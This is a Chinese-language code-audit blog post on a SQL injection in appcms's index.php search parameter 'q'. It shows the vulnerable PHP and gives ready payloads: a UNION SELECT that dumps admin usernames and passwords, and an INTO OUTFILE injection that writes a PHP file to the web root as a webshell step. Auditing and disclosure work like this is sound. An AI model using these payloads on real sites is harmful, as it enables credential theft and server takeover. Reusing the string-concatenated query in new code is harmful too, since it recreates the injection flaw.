p0's blog | 破 关注网络安全
appcms 主页注入
发表于: | 分类: 代码审计 | 评论:0 | 阅读: 890

index.php

if (trim($_GET['q']) != '' && !isset($_GET['tpl'])) {
$str = '';
$sql = "SELECT app_id,app_title,app_down FROM " . TB_PREFIX . "app_list WHERE app_title LIKE '%" . trim($_GET['q']) . "%' LIMIT 15";
$app_list = $dbm ->query($sql);
if (count($app_list['list']) > 0) {
foreach ($app_list['list'] as $k => $v){
$app_list['list'][$k]['app_title'] = helper :: utf8_substr($v['app_title'], 0, 20);
}
echo json_encode($app_list['list']);
exit;
} else {
exit;
}
}

$_GET['q']直接带入查询

构造:
q=1%'union select 1,uname,upass from appcms_admin_list %23

1%’闭合前面的’% 使like语句完整 #注释掉后面语句 联合查询出数据

Sql语句变成
SELECT app_id,app_title,app_down FROM . TB_PREFIX . app_list WHERE app_title LIKE '%1%'union select 1,uname,upass from appcms_admin_list

wps3006.tmp.jpeg

写shell:
q=1%'union select 1,2,'aaa' into outfile 'D:\\WWW\\a.php' %23

语句变成:
SELECT app_id,app_title,app_down FROM . TB_PREFIX . app_list WHERE app_title LIKE '%1%'union select 1,2,'aaa' into outfile 'D:\\WWW\\a.php'


著作权归作者所有。
商业转载请联系作者获得授权,非商业转载请注明出处。
作者:p0
链接:http://p0sec.net/index.php/archives/11/
来源:http://p0sec.net/

添加新评论

TOP